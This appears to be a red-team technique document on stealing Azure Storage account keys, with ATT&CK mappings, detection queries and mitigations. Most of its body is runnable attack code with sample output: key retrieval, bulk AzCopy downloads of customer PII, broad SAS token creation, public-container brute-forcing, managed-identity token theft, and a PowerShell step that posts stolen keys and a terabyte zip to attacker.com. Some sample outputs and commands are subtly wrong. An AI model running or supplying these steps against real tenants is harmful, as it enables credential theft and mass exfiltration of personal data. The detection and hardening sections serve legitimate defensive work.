MCADDF

CA-UNSC-008: Azure Storage Account Key Theft

1. METADATA HEADER

Attribute Details
Technique ID CA-UNSC-008
MITRE ATT&CK v18.1 T1552.001 - Unsecured Credentials: Credentials in Files + T1530 - Data from Cloud Storage Object
Tactic Credential Access (TA0006) + Collection (TA0009)
Platforms Azure (all cloud regions), Entra ID
Severity Critical
CVE CVE-2023-28432 (MinIO-related; Azure Storage similar patterns)
Technique Status ACTIVE
Last Verified 2026-01-06
Affected Versions All Azure regions, all storage types (Blob, File, Table, Queue)
Patched In Partial: User Delegation SAS recommended; Shared Key authorization disable available but rarely enforced
Author SERVTEPArtur Pchelnikau

Note: Sections have been dynamically renumbered based on applicability. All sections required for Azure storage credential access attacks are included. This technique bridges both Credential Access (stealing keys) and Collection (downloading data). Windows-specific sections replaced with Azure diagnostic logging and real-time threat detection.


2. EXECUTIVE SUMMARY

Concept

Azure Storage Account Key theft is the unauthorized extraction and abuse of storage account access keys—master credentials that grant unrestricted access to all data in Azure Blob Storage, File Shares, Table Storage, and Queue Services. Attackers exploit weak RBAC configurations, privilege escalation vulnerabilities, or compromised service principal credentials to enumerate and retrieve storage account keys, enabling them to access, modify, or exfiltrate terabytes of business-critical data. The threat is particularly severe because a single compromised key permits full account compromise: read/write/delete permissions on all data containers, disabling of logging for hiding tracks, and modification of authentication policies. Unlike time-limited SAS tokens, storage account keys have indefinite validity, enabling persistent access even after the initial compromise vector is sealed.

Attack Surface

Business Impact

Compromised storage account keys enable attackers to exfiltrate petabytes of sensitive data, deploy malware via file shares, corrupt or delete backups, and establish persistent covert access to critical business systems without detection. Organizations report multi-month undetected dwell time because legitimate applications constantly access the same storage simultaneously, making attacker activity indistinguishable from normal operations. Storage account compromise often precedes ransomware deployment (attacker deletes backups before encryption), regulatory penalties under GDPR/HIPAA/SOX, and reputational damage.

Technical Context

Storage account key extraction typically requires either (1) RBAC role with Microsoft.Storage/storageAccounts/listKeys/action permission, (2) exploitation of misconfigured public access (no authentication), or (3) abuse of managed identity tokens from compromised compute resources. Data exfiltration is rapid (10+ GB/hour via AzCopy) and often undetected due to lack of baseline monitoring. Unlike on-premises file servers with network-based detection, cloud storage access is global—attacker can exfiltrate from any geographic location if authentication is valid. Storage account keys lack expiration, requiring manual rotation to invalidate stolen credentials.


Operational Risk

Dimension Assessment Details
Execution Risk Low Requires RBAC role or public access; no privilege escalation necessary if permissions already granted
Stealth High Legitimate workloads constantly access storage; bulk downloads hide in normal traffic if properly timed
Reversibility No Exfiltrated data cannot be “un-stolen.” Key rotation invalidates keys but doesn’t recover data.
Detection Likelihood Medium Requires diagnostic logging enabled + baseline anomaly analysis; most orgs lack storage monitoring
Scale of Impact Extreme Single storage account can contain petabytes; one key = total compromise
Data Exposure Window Months Undetected access often lasts 30-90 days before discovery via backup/audit analysis

Compliance Mappings

Framework Control / ID Description
CIS Benchmark 5.1.3, 5.2.1 Disable Shared Key authorization; Use SAS tokens or RBAC only
DISA STIG SC-28, IA-6 Information at Rest; Information System and Communications Protection
CISA SCuBA Data 1.1, Data 1.3 Restrict data access; Manage credentials lifecycle
NIST 800-53 SC-28, AC-6, IA-5 Information at Rest; Least Privilege; Authentication & Access Control
GDPR Art. 32, Art. 33, Art. 34 Security of Processing; Breach Notification (data exfil = mandatory notification)
DORA Art. 9 Protection and Prevention (financial sector must prevent key theft)
NIS2 Art. 21 Cyber Risk Management Measures (critical infrastructure key protection)
ISO 27001 A.10.1, A.8.3, A.13.1 Cryptography Policy; Access Control; Information Transfer Protection
ISO 27005 8.3 Risk Assessment; key theft scenario
HIPAA § 164.312(a)(2)(i) Data encryption at rest (storage keys protect this)
SOX § 404 IT General Controls (access to financial data storage)

3. TECHNICAL PREREQUISITES

Required Privileges & Access

Scenario Required Access Azure RBAC Action Authentication
Retrieve Storage Account Keys RBAC: Storage Account Key Operator Service Role (or Owner/Contributor) Microsoft.Storage/storageAccounts/listKeys/action Service Principal, User, Managed Identity
Generate SAS Token Key or delegation access (if key-signed) Microsoft.Storage/storageAccounts/generateSecrets/action Must have key or delegation ability
Access Public Blob (No Auth) Public container access enabled None Anonymous HTTP access
Enumerate Storage Accounts List permission or public enumeration Microsoft.Storage/storageAccounts/read Any authenticated user (or DNS brute-force)
Extract Cloud Shell Credentials Access to Cloud Shell container Managed Identity of Cloud Shell Azure compute with storage identity

Supported Versions

Azure Component Supported Details
Azure Blob Storage ✅ All versions (all regions) Primary target (largest data volumes)
Azure File Shares ✅ All versions SMB protocol over HTTPS; same key-based auth
Table Storage ✅ All versions NoSQL; same shared key auth
Queue Storage ✅ All versions Message queues; same shared key auth
Azure Storage (Premium) ✅ All versions Premium tier; same access keys
Azure Data Lake Storage (ADLS) ✅ Partial (primarily uses RBAC) Hierarchy; keys still valid but RBAC preferred
Azure Synapse ✅ Connected to storage accounts Accesses via storage keys or RBAC

Required Tools & Components

Tool Version URL Purpose Privilege Level
Azure PowerShell (Az.Storage) 5.0+ https://github.com/Azure/azure-powershell Key retrieval, blob operations ⚠️ High (listKeys required)
Azure CLI 2.30+ https://learn.microsoft.com/cli/azure/ Alternative to PowerShell ⚠️ High (listKeys required)
AzCopy 10.0+ https://learn.microsoft.com/azure/storage/common/storage-use-azcopy Bulk data transfer (highly detectable) ✅ Uses keys/SAS
Rclone 1.50+ https://rclone.org/ Cross-cloud sync (suspicious user agent) ✅ Uses keys/SAS
Azure Storage Explorer 1.20+ Microsoft Store GUI blob/file browser (leaves process artifacts) ✅ Uses keys/SAS
Azure SDK (Python/C#/.NET) Latest https://github.com/Azure/azure-sdk Programmatic access (custom scripts) ✅ Uses keys/SAS
curl / wget Built-in Native utilities Direct HTTP/HTTPS requests (URL with SAS) ✅ Uses SAS tokens
Goblob Latest https://github.com/RiskIQ/goblob Bruteforce storage account name enumeration ✅ Public access discovery
QuickAZ Latest https://github.com/vulnersCom/QuickAZ DNS-based storage account enumeration ✅ Public discovery

4. ENVIRONMENTAL RECONNAISSANCE

Management Station / PowerShell Reconnaissance

Step 1: Enumerate Storage Accounts in Subscription

Objective: Discover all storage accounts accessible from current identity to identify targets containing sensitive data (databases, backups, customer data).

Command (All Versions):

# Connect to Azure
Connect-AzAccount

# List all storage accounts in current subscription
Get-AzStorageAccount | Select-Object StorageAccountName, ResourceGroupName, Location, SkuName

# Get more details (including access tier, https enforcement, diagnostics)
Get-AzStorageAccount | ForEach-Object {
    Write-Host "Storage Account: $($_.StorageAccountName)"
    Write-Host "  Resource Group: $($_.ResourceGroupName)"
    Write-Host "  Location: $($_.Location)"
    Write-Host "  Sku: $($_.SkuName)"
    Write-Host "  HTTPS Only: $($_.EnableHttpsTrafficOnly)"
    Write-Host "  Shared Key Access: $($_.AllowSharedKeyAccess)"  # Check if keys disabled
    Write-Host "  ---"
}

# Get subscription ID for scoping
$SubId = (Get-AzSubscription).Id
Write-Host "Current Subscription: $SubId"

Expected Output:

Storage Account: prodstorageacct001
  Resource Group: production-rg
  Location: eastus
  Sku: Standard_LRS
  HTTPS Only: True
  Shared Key Access: True

Storage Account: backupstorageacct002
  Resource Group: backup-rg
  Location: westus
  Sku: Premium_LRS
  HTTPS Only: True
  Shared Key Access: False

Current Subscription: a1b2c3d4-e5f6-7890-abcd-ef1234567890

What This Means:

Red Flags (Vulnerable Configuration):


Step 2: Check Current User Permissions on Storage Account

Objective: Verify if current identity can retrieve storage account keys (permission to Microsoft.Storage/storageAccounts/listKeys/action).

Command (All Versions):

# Get current user context
$CurrentUser = (Get-AzContext).Account.Id
Write-Host "Current Identity: $CurrentUser"

# Check if we can list storage account keys
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

try {
    $Keys = Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName -ErrorAction Stop
    Write-Host "[+] SUCCESS: Can retrieve storage account keys!" -ForegroundColor Green
    Write-Host "[+] Primary Key: $($Keys[0].Value.Substring(0, 20))..." -ForegroundColor Green
    Write-Host "[+] Secondary Key: $($Keys[1].Value.Substring(0, 20))..." -ForegroundColor Green
} catch {
    Write-Host "[-] Access Denied: Cannot retrieve storage account keys" -ForegroundColor Red
    Write-Host "[-] Error: $($_.Exception.Message)"
}

# Check RBAC role for storage account
$StorageRBACRoles = Get-AzRoleAssignment -ResourceGroupName $ResourceGroupName -ResourceName $StorageAccountName -ResourceType "Microsoft.Storage/storageAccounts"
Write-Host "`nCurrent RBAC Assignments:"
$StorageRBACRoles | Select-Object DisplayName, RoleDefinitionName | Format-Table

Expected Output (Vulnerable):

Current Identity: user@contoso.com

[+] SUCCESS: Can retrieve storage account keys!
[+] Primary Key: DefaultEndpointsProtocol=h...
[+] Secondary Key: DefaultEndpointsProtocol=h...

Current RBAC Assignments:

DisplayName            RoleDefinitionName
-----------            ------------------
user@contoso.com       Storage Account Key Operator Service Role
user@contoso.com       Contributor

Expected Output (Secure):

[-] Access Denied: Cannot retrieve storage account keys
[-] Error: User does not have permission to access this resource

Current RBAC Assignments:

DisplayName            RoleDefinitionName
-----------            ------------------
user@contoso.com       Reader

What This Means:


Step 3: Enumerate Containers and Data Volume

Objective: Identify high-value targets (large data volumes, sensitive data types) before extraction.

Command (All Versions):

# Get storage account key (if accessible)
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

$StorageAccountKey = (Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName).Value[0]

# Create storage context
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey

# List all containers
$Containers = Get-AzStorageContainer -Context $StorageContext
Write-Host "Containers in $StorageAccountName : $($Containers.Count)"
$Containers | Select-Object Name | Format-Table

# Enumerate container contents and sizes
foreach ($Container in $Containers) {
    $Blobs = Get-AzStorageBlob -Container $Container.Name -Context $StorageContext
    $TotalSize = ($Blobs | Measure-Object -Property Length -Sum).Sum / 1GB
    
    Write-Host "Container: $($Container.Name)"
    Write-Host "  Blob Count: $($Blobs.Count)"
    Write-Host "  Total Size: $($TotalSize.ToString('F2')) GB"
    Write-Host "  Sample Files:"
    $Blobs | Select-Object -First 5 Name | ForEach-Object { Write-Host "    - $($_.Name)" }
    Write-Host "  ---"
}

Expected Output:

Containers in prodstorageacct001 : 5

Name
----
backups
customer-data
logs
temp
uploads

Container: backups
  Blob Count: 2145
  Total Size: 850.34 GB
  Sample Files:
    - database-backup-2026-01-06.bak
    - database-backup-2026-01-05.bak
    - application-config-backup.zip
    - vm-image-disk-1.vhd

Container: customer-data
  Blob Count: 45632
  Total Size: 1200.56 GB
  Sample Files:
    - customer-pii-export-2026.csv
    - customer-financial-records.xlsx
    - customer-emails-backup.sql

Container: logs
  Blob Count: 89234
  Total Size: 450.12 GB
  Sample Files:
    - 2026-01-06-application.log
    - 2026-01-06-access.log

What This Means:


Linux/Bash / Azure CLI Reconnaissance

Step 1: Enumerate Storage Accounts via Azure CLI

Objective: Discover storage accounts using Azure CLI (useful in containerized/Linux environments).

Command (All Versions - Bash):

# Authenticate to Azure
az login

# List all storage accounts in current subscription
az storage account list --output table

# Get detailed information
az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup, Location:location, HttpsOnly:enableHttpsTrafficOnly, SharedKeyAccess:allowSharedKeyAccess}"

# Get current subscription
az account show --query name

Expected Output:

Name                       ResourceGroup    Location    HttpsOnly    SharedKeyAccess
-------------------------  ---------------  ---------   ----------   ---------------
prodstorageacct001         production-rg    eastus      true         true
backupstorageacct002       backup-rg        westus      true         false

Step 2: Enumerate Blobs via Azure CLI

Objective: List containers and blobs using Azure CLI.

Command (All Versions - Bash):

# List containers
az storage container list --account-name prodstorageacct001 --account-key <storage-key> --output table

# List blobs in container
az storage blob list --account-name prodstorageacct001 --container-name customer-data --account-key <storage-key> --output table

5. DETAILED EXECUTION METHODS AND THEIR STEPS


METHOD 1: Direct Storage Account Key Retrieval & Data Exfiltration (Authorized Access)

Supported Versions: All Azure regions, all storage types

Prerequisites: Entra ID authentication with Storage Account Key Operator Service Role or higher (or Owner/Contributor); network connectivity to Azure Management API (https://management.azure.com)


Step 1: Authenticate to Azure

Objective: Obtain Entra ID access token required to authenticate to Azure Management API and retrieve storage account keys.

Command (Interactive User Login - All Versions):

# Interactive login (prompts for browser authentication)
Connect-AzAccount

# Verify successful authentication
$Context = Get-AzContext
Write-Host "Authenticated as: $($Context.Account.Id)"
Write-Host "Subscription: $($Context.Subscription.Name)"

Command (Service Principal Authentication - All Versions):

# Using tenant/client secret (common in automation)
$TenantId = "contoso.onmicrosoft.com"
$AppId = "a1b2c3d4-e5f6-7890-abcd-ef1234567890"
$ClientSecret = "client-secret-value"

$SecureSecret = ConvertTo-SecureString -String $ClientSecret -AsPlainText -Force
Connect-AzAccount -ServicePrincipal -Credential (New-Object PSCredential($AppId, $SecureSecret)) -TenantId $TenantId

# Verify
$Context = Get-AzContext
Write-Host "[+] Authenticated as service principal: $($Context.Account.Id)"

Expected Output:

Authenticated as: user@contoso.com
Subscription: Production-Subscription

[+] Authenticated as service principal: a1b2c3d4-e5f6-7890-abcd-ef1234567890

Step 2: Retrieve Storage Account Keys

Objective: Extract the primary and secondary access keys from the storage account (keys provide unrestricted access to all data).

Command (All Versions):

# Retrieve storage account keys
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

$StorageKeys = Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName

# Display keys
$PrimaryKey = $StorageKeys[0].Value
$SecondaryKey = $StorageKeys[1].Value

Write-Host "Primary Key: $PrimaryKey"
Write-Host "Secondary Key: $SecondaryKey"
Write-Host "[+] Keys retrieved successfully"

# Alternative: Get connection string (combines storage account name + key)
$StorageAccount = Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName
$ConnectionString = "DefaultEndpointsProtocol=https;AccountName=$StorageAccountName;AccountKey=$PrimaryKey;EndpointSuffix=core.windows.net"
Write-Host "Connection String: $ConnectionString"

Expected Output:

Primary Key: DefaultEndpointsProtocol=https;AccountName=prodstorageacct001;AccountKey=ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123==;EndpointSuffix=core.windows.net
Secondary Key: DefaultEndpointsProtocol=https;AccountName=prodstorageacct001;AccountKey=XYZ789ABC123XYZ789ABC123XYZ789ABC123XYZ789ABC123XYZ789ABC123ABC==;EndpointSuffix=core.windows.net
[+] Keys retrieved successfully

Connection String: DefaultEndpointsProtocol=https;AccountName=prodstorageacct001;AccountKey=ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123==;EndpointSuffix=core.windows.net

What This Means:

Business Impact (Post-Extraction):

Version Note: Command identical across all Azure regions and subscription types.

OpSec & Evasion:

Troubleshooting:

References:


Step 3: Create Storage Context and List Containers

Objective: Use retrieved key to authenticate to storage account and enumerate containers (identify data to exfiltrate).

Command (All Versions):

# Create storage context with primary key
$StorageAccountName = "prodstorageacct001"
$StorageAccountKey = "ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123=="

$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey

# List all containers
$Containers = Get-AzStorageContainer -Context $StorageContext
Write-Host "Containers found: $($Containers.Count)"
$Containers | Select-Object Name, Properties | Format-Table

# Get container details
foreach ($Container in $Containers) {
    $Blobs = Get-AzStorageBlob -Container $Container.Name -Context $StorageContext
    Write-Host "Container: $($Container.Name) - $($Blobs.Count) blobs"
}

Expected Output:

Containers found: 5

Name              Properties
----              ----------
backups           Microsoft.Azure.Storage.Blob.BlobContainerProperties
customer-data     Microsoft.Azure.Storage.Blob.BlobContainerProperties
logs              Microsoft.Azure.Storage.Blob.BlobContainerProperties
temp              Microsoft.Azure.Storage.Blob.BlobContainerProperties
uploads           Microsoft.Azure.Storage.Blob.BlobContainerProperties

Container: backups - 2145 blobs
Container: customer-data - 45632 blobs
Container: logs - 89234 blobs
Container: temp - 523 blobs
Container: uploads - 1204 blobs

Step 4: Download Data (Bulk Exfiltration)

Objective: Extract sensitive data from containers using storage key.

Command (Download Single Blob - All Versions):

# Download single blob
$StorageContext = New-AzStorageContext -StorageAccountName "prodstorageacct001" -StorageAccountKey "ABC123DEF456..."

$BlobName = "customer-pii-export-2026.csv"
$ContainerName = "customer-data"
$DownloadPath = "C:\Temp\customer-pii-export-2026.csv"

Get-AzStorageBlobContent -Blob $BlobName -Container $ContainerName -Destination $DownloadPath -Context $StorageContext

Write-Host "[+] Downloaded: $BlobName to $DownloadPath"

Command (Bulk Download Using AzCopy - Faster, More Detectable):

# AzCopy is optimized for bulk transfers (faster than PowerShell)
$StorageAccountName = "prodstorageacct001"
$StorageAccountKey = "ABC123DEF456..."
$ContainerName = "customer-data"
$DownloadPath = "C:\Temp\exfil"

# Create download directory
New-Item -ItemType Directory -Path $DownloadPath -Force

# Use AzCopy (much faster than PowerShell)
$AzCopyPath = "C:\Program Files\AzCopy\azcopy.exe"
$SourceUri = "https://$StorageAccountName.blob.core.windows.net/$ContainerName"

& $AzCopyPath copy "$SourceUri?$StorageAccountKey" $DownloadPath --recursive --transfer-method=concurrent

Write-Host "[+] Bulk download complete: $DownloadPath"

Expected Output (PowerShell):

[+] Downloaded: customer-pii-export-2026.csv to C:\Temp\customer-pii-export-2026.csv

Expected Output (AzCopy):

[Completed] Synchronization finished successfully. 12345 files transferred, 0 files skipped.

INFO: Transfer speed: 150 MB/s
[+] Bulk download complete: C:\Temp\exfil

What This Means:

Business Impact:

Version Note: AzCopy available on Windows/Linux/Mac.

OpSec & Evasion:

Troubleshooting:

References:


Step 5: Exfiltrate Keys/Data to Attacker Infrastructure

Objective: Secure stolen data and keys for long-term access.

Command (Upload Keys to Attacker Server - HTTPS):

# Exfiltrate storage key and connection string
$StorageAccountName = "prodstorageacct001"
$StorageKeys = Get-AzStorageAccountKey -ResourceGroupName "production-rg" -AccountName $StorageAccountName
$PrimaryKey = $StorageKeys[0].Value

$ExfiltrationData = @{
    StorageAccountName = $StorageAccountName
    PrimaryKey = $PrimaryKey
    SecondaryKey = $StorageKeys[1].Value
    TimeExtracted = (Get-Date).ToString()
}

$JsonBody = $ExfiltrationData | ConvertTo-Json

# Send to attacker C2 server
$Uri = "https://attacker.com:8443/upload"
try {
    $Response = Invoke-WebRequest -Uri $Uri -Method POST -Body $JsonBody -ContentType "application/json"
    Write-Host "[+] Storage keys exfiltrated to $Uri" -ForegroundColor Green
} catch {
    Write-Host "[-] Exfiltration failed: $_"
}

Command (Download Data from Local Storage to Attacker Server):

# After downloading data locally, compress and exfiltrate
$LocalDataPath = "C:\Temp\exfil\customer-data"
$ZipPath = "C:\Temp\customer-data.zip"

# Compress
Compress-Archive -Path $LocalDataPath -DestinationPath $ZipPath -CompressionLevel Maximum

# Exfiltrate
$Uri = "https://attacker.com:8443/upload"
$FileBytes = [System.IO.File]::ReadAllBytes($ZipPath)
$Request = [System.Net.HttpWebRequest]::CreateHttp($Uri)
$Request.Method = "POST"
$Request.ContentType = "application/zip"
$Request.ContentLength = $FileBytes.Length
$RequestStream = $Request.GetRequestStream()
$RequestStream.Write($FileBytes, 0, $FileBytes.Length)
$RequestStream.Close()
$Response = $Request.GetResponse()

Write-Host "[+] Data exfiltrated: $(Get-Item $ZipPath | Select-Object -ExpandProperty Length) bytes"

Expected Output:

[+] Storage keys exfiltrated to https://attacker.com:8443/upload
[+] Data exfiltrated: 1200568000000 bytes (~1.2 TB)

METHOD 2: SAS Token Generation & Exfiltration (If Key Access Available)

Supported Versions: All Azure regions

Prerequisites: Access to storage account key (from METHOD 1) or delegation access

Difficulty: Medium (requires understanding of SAS token permissions and scope)


Step 1: Generate Account-Level SAS Token

Objective: Create a limited-time, limited-permission SAS token signed with storage account key (enables sharing of key without exposing full account key).

Command (All Versions):

# Get storage account key
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"
$StorageKeys = Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName
$StorageKey = $StorageKeys[0].Value

# Create storage context
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageKey

# Generate Account-Level SAS Token (grants broad access)
$SASToken = New-AzStorageAccountSASToken -Service Blob,File,Table,Queue `
    -ResourceType Service,Container,Object `
    -Permission racwd `
    -ExpiryTime (Get-Date).AddHours(24)

Write-Host "Generated SAS Token: $SASToken"
Write-Host "[+] Token valid for 24 hours"

# Create URL with SAS token (can be shared/exfiltrated)
$SASUri = "https://$StorageAccountName.blob.core.windows.net$SASToken"
Write-Host "SAS URI: $SASUri"

Expected Output:

Generated SAS Token: sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456ABC123DEF456ABC123DEF456==

[+] Token valid for 24 hours

SAS URI: https://prodstorageacct001.blob.core.windows.net?sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456ABC123DEF456ABC123DEF456==

What This Means:

Advantages of SAS over Full Key:


Step 2: Use SAS Token to Access Storage (Attacker-Side)

Objective: Demonstrate how attacker can use SAS token to access storage without account key.

Command (All Versions - From Attacker System):

# Attacker has SAS token (no account key needed)
$SASToken = "sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456ABC123DEF456ABC123DEF456=="
$StorageAccountName = "prodstorageacct001"

# Create storage context with SAS (no key needed)
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -SasToken $SASToken

# Access data with SAS token
$Containers = Get-AzStorageContainer -Context $StorageContext
Write-Host "[+] Accessed storage with SAS token: $($Containers.Count) containers found"

# Download blob with SAS token
Get-AzStorageBlobContent -Blob "customer-data.csv" -Container "customer-data" -Destination "C:\Temp\" -Context $StorageContext
Write-Host "[+] Downloaded blob using SAS token"

Expected Output:

[+] Accessed storage with SAS token: 5 containers found
[+] Downloaded blob using SAS token

Business Impact:


METHOD 3: Public Blob/Container Enumeration (No Authentication)

Supported Versions: All Azure regions

Prerequisites: Public container access enabled (no authentication required)

Difficulty: Low (requires only enumeration, no credentials)


Step 1: Bruteforce Storage Account Names

Objective: Discover Azure Storage accounts by guessing common naming patterns.

Command (Goblob Enumeration Tool - Linux):

# Install Goblob
git clone https://github.com/RiskIQ/goblob.git
cd goblob
pip install -r requirements.txt

# Bruteforce storage account names
python goblob.py -w wordlist.txt --thread 50

# Common wordlist patterns
# - company name: "contoso", "acmecorp", "mycompany"
# - storage purpose: "backup", "data", "logs", "prod", "dev"
# - combinations: "contosobkp", "contosoprod", "acmedata"

Command (QuickAZ - DNS-Based Enumeration):

# Install QuickAZ
pip install quickaz

# Scan for storage accounts
quickaz -w wordlist.txt -t 100

# Output: List of valid storage accounts with public containers

Expected Output:

[+] Found storage account: contosobackup.blob.core.windows.net (ACCESSIBLE)
[+] Found storage account: contosoprod.blob.core.windows.net (ACCESSIBLE)
[+] Found storage account: acmecorplogs.blob.core.windows.net (ACCESSIBLE)

Container: backups (public read)
Container: customer-data (public read)
Container: logs (public read)

What This Means:


Step 2: Download Data from Public Containers

Objective: Exfiltrate data from publicly accessible containers.

Command (All Versions - Using curl):

# List blobs in public container
curl https://contosobackup.blob.core.windows.net/backups?restype=container&comp=list

# Download blob from public container (no authentication)
curl https://contosobackup.blob.core.windows.net/backups/database-backup-2026-01-06.bak -o database-backup-2026-01-06.bak

# Bulk download using wget
wget -r https://contosobackup.blob.core.windows.net/backups/

Expected Output:

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ...>
  <Blobs>
    <Blob>
      <Name>database-backup-2026-01-06.bak</Name>
      <Url>https://contosobackup.blob.core.windows.net/backups/database-backup-2026-01-06.bak</Url>
      <Size>850000000000</Size>
    </Blob>
    ...
  </Blobs>
</EnumerationResults>

[+] database-backup-2026-01-06.bak (850 GB downloaded)
[+] database-backup-2026-01-05.bak (850 GB downloaded)
[+] Total: 1.7 TB exfiltrated

Business Impact:


METHOD 4: Managed Identity Token Extraction (SSRF from Compute)

Supported Versions: All Azure compute resources with assigned managed identity

Prerequisites: Code execution on Azure compute resource with storage-accessing managed identity

Difficulty: Medium (requires understanding of instance metadata service)


Step 1: Extract Managed Identity Token from Metadata Service

Objective: Retrieve Entra ID access token from Azure Instance Metadata Service (allows storage access if identity has permissions).

Command (From Azure VM/Function - All Versions):

# Get managed identity token (from within Azure compute)
$MetadataUri = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2017-09-01&resource=https://storage.azure.com"

$Response = Invoke-WebRequest -Uri $MetadataUri -Headers @{Metadata="true"} -UseBasicParsing
$TokenResponse = $Response.Content | ConvertFrom-Json
$AccessToken = $TokenResponse.access_token

Write-Host "[+] Token obtained: $($AccessToken.Substring(0, 50))..."

Expected Output:

[+] Token obtained: eyJhbGciOiJSUzI1NiIsImtpZCI6IjFjQUZwYjR...

Step 2: Use Token to Access Storage

Objective: Authenticate to storage account using managed identity token.

Command (All Versions):

# Get token
$MetadataUri = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2017-09-01&resource=https://storage.azure.com"
$TokenResponse = Invoke-WebRequest -Uri $MetadataUri -Headers @{Metadata="true"} -UseBasicParsing | ConvertFrom-Json
$AccessToken = $TokenResponse.access_token

# Use token to access storage (REST API)
$StorageAccountName = "prodstorageacct001"
$ContainerName = "data"

$ListUri = "https://$StorageAccountName.blob.core.windows.net/$ContainerName?restype=container&comp=list"
$Headers = @{Authorization = "Bearer $AccessToken"}

$BlobList = Invoke-WebRequest -Uri $ListUri -Headers $Headers -UseBasicParsing
$BlobXml = [xml]$BlobList.Content

Write-Host "[+] Found $($BlobXml.EnumerationResults.Blobs.Blob.Count) blobs in $ContainerName"

6. ATTACK SIMULATION & VERIFICATION (Atomic Red Team)

Atomic Red Team Tests

Execution:

Invoke-AtomicTest T1530 -TestNumbers 1
Invoke-AtomicTest T1552.001 -TestNumbers 15

Reference: Atomic Red Team T1530 - GitHub


7. SPLUNK DETECTION RULES

Rule 1: Unusual Storage Account Key Retrieval

Rule Configuration:

SPL Query:

sourcetype=azure:audit OperationName="List Storage Account Keys" ResultType="Success"
| stats count by Caller, CallerIpAddress, Resource, TimeCreated
| where count >= 1

What This Detects:


Rule 2: Bulk Data Download from Storage Account

Rule Configuration:

SPL Query:

sourcetype=azure:storage OperationName="GetBlob" 
| stats count by CallerIpAddress, UserAgent, TimeGenerated
| where count > 100
| search UserAgent!="*AzureStorageExplorer*"  # Exclude admin tools

What This Detects:


8. MICROSOFT SENTINEL DETECTION

Query 1: Storage Account Key List Access

Rule Configuration:

KQL Query:

AzureActivity
| where OperationName == "List Storage Account Keys"
| where ActivityStatus =~ "Success"
| project TimeGenerated, Caller, CallerIpAddress, Resource, OperationName

Manual Configuration:

  1. SentinelAnalytics+ CreateScheduled query rule
  2. Name: Storage Account Key Retrieval
  3. Paste KQL above
  4. Frequency: 10 minutes
  5. Severity: High
  6. Create

Query 2: Anomalous Blob Read Pattern

Rule Configuration:

KQL Query:

StorageBlobLogs
| where OperationName == "GetBlob"
| where AuthenticationType == "SAS" or AuthenticationType == "AccountKey"
| summarize ReadCount = count() by CallerIpAddress, UserAgent, bin(TimeGenerated, 1h)
| where ReadCount > 100
| join kind=inner (StorageBlobLogs | where OperationName == "GetBlob" | summarize by CallerIpAddress) on CallerIpAddress

What This Detects:


9. AZURE DIAGNOSTIC LOGGING CONFIGURATION

Enable Storage Account Diagnostic Logging

Manual Steps (Azure Portal):

  1. Navigate to Storage Account → Select account
  2. Left menu → Diagnostic settings
  3. Click + Add diagnostic setting
  4. Name: Storage-Blob-Logging
  5. Logs:
    • Check: StorageRead, StorageWrite, StorageDelete
  6. Destination:
    • Send to Log Analytics workspace (your Sentinel workspace)
  7. Save
  8. Wait 15 minutes for first events

Manual Configuration (PowerShell):

# Enable diagnostic logging for storage account
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"
$WorkspaceId = "/subscriptions/{subId}/resourcegroups/{rg}/providers/microsoft.operationalinsights/workspaces/{workspace}"

$StorageAccountId = "/subscriptions/{subId}/resourceGroups/$ResourceGroupName/providers/Microsoft.Storage/storageAccounts/$StorageAccountName"

Set-AzDiagnosticSetting -ResourceId $StorageAccountId `
    -Name "StorageDiagnostics" `
    -WorkspaceId $WorkspaceId `
    -Enabled $true `
    -Category StorageRead, StorageWrite, StorageDelete

Verify Logging (Sentinel):

// Run in Sentinel Logs
StorageBlobLogs
| take 20

10. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

1.1 Disable Shared Key Authorization (Use RBAC + SAS Only)

Objective: Eliminate storage account key access entirely; force RBAC or User Delegation SAS (both respect Azure IAM policies).

Applies To: All storage accounts

Impact: Prevents METHOD 1 (direct key retrieval)

Manual Steps (Azure Portal):

  1. Navigate to Storage AccountSettingsConfiguration
  2. Find: Allow storage account key access
  3. Set to: Disabled
  4. Save

Manual Steps (PowerShell):

# Disable shared key access
Set-AzStorageAccount -ResourceGroupName "production-rg" `
    -AccountName "prodstorageacct001" `
    -AllowSharedKeyAccess $false

# Verify
$Account = Get-AzStorageAccount -ResourceGroupName "production-rg" -Name "prodstorageacct001"
Write-Host "Shared Key Access: $($Account.AllowSharedKeyAccess)"

Expected Output:

Shared Key Access: False

Impact on Users:

Migration Path:

  1. Before disabling: Identify all applications using storage keys
  2. Migrate to:
    • Azure Managed Identity (preferred for Azure-hosted apps)
    • User Delegation SAS (for external users/partners)
    • Service Principal with RBAC role
  3. Testing: Test migrated apps in dev/test before production
